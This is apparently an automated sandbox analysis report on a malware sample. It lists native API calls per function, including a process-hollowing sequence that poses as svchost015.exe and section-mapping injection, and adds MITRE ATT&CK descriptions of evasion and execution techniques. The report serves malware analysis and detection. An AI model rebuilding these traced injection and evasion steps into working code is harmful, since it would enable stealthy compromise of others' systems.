NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401654

Memory Dump Source

Source File: 00000004.00000002.2403612883.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_birajci.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2742df03783a4af2630757ed973f661598ad208167d61c6187633747a4b73a2d
Instruction ID: 77e294e5c29794052b934d18963121443c47762038f294bdc3221756e3d7f28a
Opcode Fuzzy Hash: 2742df03783a4af2630757ed973f661598ad208167d61c6187633747a4b73a2d
Instruction Fuzzy Hash: 74512C71900209BFEF209F91CC49FEFBBB8EF85B00F104159F951AA2A5E7B09941CB24

Function 004014AD Relevance: 10.7, APIs: 7, Instructions: 172
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C0
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401601
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401632
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401654

Memory Dump Source

Source File: 00000004.00000002.2403612883.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_birajci.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: c2d055a4891878af715572554fd1d714be86d732ae2eeb963f093206d5304122
Instruction ID: d83691bfaa908ebf768f39752e331a6567bad0fa9e9ed4c6933609491a97c617
Opcode Fuzzy Hash: c2d055a4891878af715572554fd1d714be86d732ae2eeb963f093206d5304122
Instruction Fuzzy Hash: 0B512B71900245BBEB209F91CC49FAF7BB8EF85B00F104129FA51BA2E5E6B49941CB64

Function 004014D5 Relevance: 10.7, APIs: 7, Instructions: 160
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C0
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401601
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401632
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401654

Memory Dump Source

Source File: 00000004.00000002.2403612883.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_birajci.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: c96008d8cce7321b8157e43aa0d4653c0fe8b81337c4837ab356279a75588f9b
Instruction ID: fd495a3767c54d0d9857a4c92bec852555a579275bcd6122a58bb2fbabb6e282
Opcode Fuzzy Hash: c96008d8cce7321b8157e43aa0d4653c0fe8b81337c4837ab356279a75588f9b
Instruction Fuzzy Hash: EF510A71900209BFEF209F91CC49FEFBBB8EF85B10F104159F911AA2A5E7B09941CB24

Function 00402F55 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 00403089
NtTerminateProcess.NTDLL ref: 004030A2

Memory Dump Source

Source File: 00000004.00000002.2403612883.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_birajci.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 385db6ec30348a4611532b2edd8baef849cc63295ecf85ab64ace8f86e30940b
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: D9413731218E098FD768EF6CA845B6277D1F798311F6643AAE809D3389EA34DC1183C5

Function 004030B2 Relevance: 1.6, APIs: 1, Instructions: 64
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtTerminateProcess.NTDLL ref: 004030A2

Memory Dump Source

Source File: 00000004.00000002.2403612883.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_birajci.jbxd

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 65859489a4ee9faed147b0567641968f4d00accd6ffd6793ae8748d9f8272d5d
Instruction ID: 842373eb4463ac9e834e9e22d1360699520a6be1e431551352f4b65e49395860
Opcode Fuzzy Hash: 65859489a4ee9faed147b0567641968f4d00accd6ffd6793ae8748d9f8272d5d
Instruction Fuzzy Hash: BA018E3360D01556C71C9A7848012F56F56D784321F34413BE1566B5D7D63E8A0B5587

Function 0067003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0067024D

Strings

cess, xrefs: 0067018D
kernel32.dll, xrefs: 0067008F, 00670095

Memory Dump Source

Source File: 00000004.00000002.2404360688.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_670000_birajci.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 3765450f4516cd5a446ec64091ac8bb535a0f3870ef1ebb4caee572cfbf4afc2
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 69526A74A01229DFEB64CF58C985BA8BBB1BF09304F1480D9E54DAB351DB30AE95DF24

Function 006FA7E0 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 006FA808
Module32First.KERNEL32(00000000,00000224), ref: 006FA828

Memory Dump Source

Source File: 00000004.00000002.2404618518.00000000006E8000.00000040.00000020.00020000.00000000.sdmp, Offset: 006E8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6e8000_birajci.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 1e90f9a1465180adc3b49b297b142ff79324e3129c3fb9b1b00556d17a663252
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 03F0F6715003186FD7203FF8988DBBE76F9AF48364F100128E75AD11C0DBB0EC464662

Function 00670E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,00670223,?,?), ref: 00670E19
SetErrorMode.KERNELBASE(00000000,?,?,00670223,?,?), ref: 00670E1E

Memory Dump Source

Source File: 00000004.00000002.2404360688.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_670000_birajci.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 5a5a572b8c797ad976ea18bf62a4cab0582b95af9600aa588e6fb0acf5fca8fa
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 6FD01231145128B7D7002A94DC09BCD7B1CDF09B62F008411FB0DD9180C770994046E5

Function 00401869 Relevance: 1.3, APIs: 1, Instructions: 64
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004018B7

Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F

Memory Dump Source

Source File: 00000004.00000002.2403612883.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_birajci.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: d06a35291f3f8f1a67eb92b1a4d5f56442e5df8eca4c3459f494d6ac572ad673
Instruction ID: c749d285b2de24fc316c817c7ae4fe8e6badb8f794917fcf5296f62f9050bee9
Opcode Fuzzy Hash: d06a35291f3f8f1a67eb92b1a4d5f56442e5df8eca4c3459f494d6ac572ad673
Instruction Fuzzy Hash: BA117C72A0C208EBE600BA949C42E7A3259AB41755F348037BA07790F0D67D9B13B72B

Function 00401874 Relevance: 1.3, APIs: 1, Instructions: 56
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004018B7

Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F

Memory Dump Source

Source File: 00000004.00000002.2403612883.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_birajci.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 68152553fbf31f958f2666c8c24b9d96b65cdd3abd047d41b0fcf87566074689
Instruction ID: b17aa293f10861f930621d71b3cc53cbab5e3b4d2edd5f2ed28ca100fb2eaa3d
Opcode Fuzzy Hash: 68152553fbf31f958f2666c8c24b9d96b65cdd3abd047d41b0fcf87566074689
Instruction Fuzzy Hash: 2C010472A0C245EBEB00ABA09C4297933659F00305F248477B606790F1D57D8712F71B

Function 00401894 Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004018B7

Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F

Memory Dump Source

Source File: 00000004.00000002.2403612883.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_birajci.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: cf92e4b68736d476fd27c40767b4ebefb699700f173f159b6ae110c0fcf0c166
Instruction ID: b8c0f1a70be89906461d65cd061911ad83e0312d7227b68f91b7eb194a97aeae
Opcode Fuzzy Hash: cf92e4b68736d476fd27c40767b4ebefb699700f173f159b6ae110c0fcf0c166
Instruction Fuzzy Hash: CA015A7260C205EBEB01AA909C42A7A3215AB45355F248437BA17790F1C67D8A53F71B

Function 00401898 Relevance: 1.3, APIs: 1, Instructions: 48
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004018B7

Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F

Memory Dump Source

Source File: 00000004.00000002.2403612883.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_birajci.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 214e81ffa9f270bed09b0236bf8c9fa2ab7398f4e2a2ef32b27fb06c8532a1cd
Instruction ID: be550ea8b7a21d6326383ffce51d2b737e5c9e0a4d996b68b29bd2ffee87f150
Opcode Fuzzy Hash: 214e81ffa9f270bed09b0236bf8c9fa2ab7398f4e2a2ef32b27fb06c8532a1cd
Instruction Fuzzy Hash: 32014F7260C205EBEB01AA909D41A7E3255AF45315F248437BA17790F1C67D8653F71B

Function 006FA49F Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 006FA4F0

Memory Dump Source

Source File: 00000004.00000002.2404618518.00000000006E8000.00000040.00000020.00020000.00000000.sdmp, Offset: 006E8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6e8000_birajci.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: bfc8d4a3487f9f52f966ab07bcba371fbb2f93b20ce66cdf37c770301f8aff71
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 12113C79A00208EFDB01DF98C985E99BBF5EF08351F058094FA489B362D371EA90DF81

Function 004018A6 Relevance: 1.3, APIs: 1, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004018B7

Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F

Memory Dump Source

Source File: 00000004.00000002.2403612883.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_birajci.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 60e6b54977058768ad97221ce1a21881eac0b699f264f3939cedf6f5eedf2412
Instruction ID: 2ebc05d28c21af2a54c4caf66b99915bed587d393384b69dc5fa06e125dea622
Opcode Fuzzy Hash: 60e6b54977058768ad97221ce1a21881eac0b699f264f3939cedf6f5eedf2412
Instruction Fuzzy Hash: 50018F7260C205EBEB01AA909C41A7E3315AB45311F208437BA06790F1C67D8712F71B

Function 0040189C Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004018B7

Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F

Memory Dump Source

Source File: 00000004.00000002.2403612883.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_birajci.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 3aa88ae79591668d5f45020df35a97080ef95a9b76e1d5ec1d9a291b84300a95
Instruction ID: 055aca88afb56c34d21ecc05ae408393a65145e0cd4b89ba36dd333808a7ed44
Opcode Fuzzy Hash: 3aa88ae79591668d5f45020df35a97080ef95a9b76e1d5ec1d9a291b84300a95
Instruction Fuzzy Hash: C401627260C205EBEB01AA909D51A6E3355AF45351F208437BA16790F1C67D8652F71B

Analysis Process: 9A25.exePID: 3500, Parent PID: 4004COMMON

Execution Graph

Execution Coverage:	51.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	17.1%
Total number of Nodes:	35
Total number of Limit Nodes:	1

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0301A090 Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 324
threadmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000004), ref: 0301A101
CreateFileA.KERNELBASE(?,00000003,00000000,00000000,00000004,00000002,00000000), ref: 0301A331
WriteFile.KERNELBASE(00000000,?,002DA188,00000000,00000000), ref: 0301A35B
FindCloseChangeNotification.KERNELBASE(00000000), ref: 0301A36D
CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000000), ref: 0301A3A5
NtUnmapViewOfSection.NTDLL(00000000,00400000), ref: 0301A3BF
VirtualAllocEx.KERNELBASE(00000000,00400000,?,00003000,00000040), ref: 0301A3EA
WriteProcessMemory.KERNELBASE(00000000,00400000,00000000,?,00000000), ref: 0301A40E
WriteProcessMemory.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 0301A470
Wow64GetThreadContext.KERNELBASE(?,00010002), ref: 0301A49E
Wow64SetThreadContext.KERNELBASE(?,00010002), ref: 0301A4C9
ResumeThread.KERNELBASE(?), ref: 0301A4DB
ExitProcess.KERNEL32(00000000), ref: 0301A4E8

Strings

svchost015.exe, xrefs: 0301A2EC, 0301A2F2

Memory Dump Source

Source File: 00000006.00000002.2794045093.0000000003019000.00000040.00001000.00020000.00000000.sdmp, Offset: 03019000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3019000_9A25.jbxd

Yara matches

Similarity

API ID: Process$MemoryThreadWrite$ContextCreateFileVirtualWow64$AllocAllocateChangeCloseExitFindNotificationResumeSectionUnmapView
String ID: svchost015.exe
API String ID: 2318777327-4092349249
Opcode ID: 6506a243c28140b7e605f1682fbb3a02570eb6cda3738287469a7d0f17233479
Instruction ID: 082250544e4d04efa4a18013c187154a7264c647bda54bf4140372f8d45c79a8
Opcode Fuzzy Hash: 6506a243c28140b7e605f1682fbb3a02570eb6cda3738287469a7d0f17233479
Instruction Fuzzy Hash: 3FE10A74A002089FDB54CF58C895FEEB7B5BF88304F148199EA08AB391D771AE85CF94

Function 030193F0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 03019B50: VirtualAlloc.KERNELBASE(00000000,030194AF,00003000,00000040), ref: 03019BD4

NtCreateFile.NTDLL(00000000,00120089,00000018,?,00000000,00000080,00000001,00000001,00000040,00000000,00000000), ref: 030195BB
FindCloseChangeNotification.KERNELBASE(00000000), ref: 0301966C

Strings

@, xrefs: 0301953D

Memory Dump Source

Source File: 00000006.00000002.2794045093.0000000003019000.00000040.00001000.00020000.00000000.sdmp, Offset: 03019000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3019000_9A25.jbxd

Yara matches

Similarity

API ID: AllocChangeCloseCreateFileFindNotificationVirtual
String ID: @
API String ID: 482251274-2766056989
Opcode ID: 0b7c4ba18bb5c7031e5492e0a79fe1b78c7ef608674f7e0fe82617d7bc66c960
Instruction ID: 163ba45a66d75840a2996fc0bf8c5604031b11f182e9f049dcd96b5e436440ed
Opcode Fuzzy Hash: 0b7c4ba18bb5c7031e5492e0a79fe1b78c7ef608674f7e0fe82617d7bc66c960
Instruction Fuzzy Hash: 1E810C75A11218EFEB24DF54CC55FDAB3B5AF88700F1481E9EA0DAB290D7706A84CF94

Function 030196B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

.tex, xrefs: 03019774

Memory Dump Source

Source File: 00000006.00000002.2794045093.0000000003019000.00000040.00001000.00020000.00000000.sdmp, Offset: 03019000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3019000_9A25.jbxd

Yara matches

Similarity

API ID:
String ID: .tex
API String ID: 0-1946526065
Opcode ID: 550378f57e0bd29913c2f3a96e12ab874d4668b693fd62ef9e030cc3a757d5d4
Instruction ID: d00e8ee1150f6b1d1486bced0c64fdcdbd2c019b92cf2b80d9858e0079e59337
Opcode Fuzzy Hash: 550378f57e0bd29913c2f3a96e12ab874d4668b693fd62ef9e030cc3a757d5d4
Instruction Fuzzy Hash: 26510575D01109EFCB44CF84C8A4BEEFBB5FF48304F248599D815AB280D375AA95CBA0

Function 03019B50 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,030194AF,00003000,00000040), ref: 03019BD4

Strings

VirtualAlloc, xrefs: 03019BB9, 03019BBC

Memory Dump Source

Source File: 00000006.00000002.2794045093.0000000003019000.00000040.00001000.00020000.00000000.sdmp, Offset: 03019000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3019000_9A25.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: c42a450ca02fa363a87eb9b6114333d3fd783ad335b2bc0464273431a807ed53
Instruction ID: 22c685f4dd0e4e44012d2d45a48c97507263d2f3fd83144abcb3ed91dc105527
Opcode Fuzzy Hash: c42a450ca02fa363a87eb9b6114333d3fd783ad335b2bc0464273431a807ed53
Instruction Fuzzy Hash: AF113D60D08389EEEB01DBE88409BEFBFB55F11704F084098D5446B282D3BA5758CBF6

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

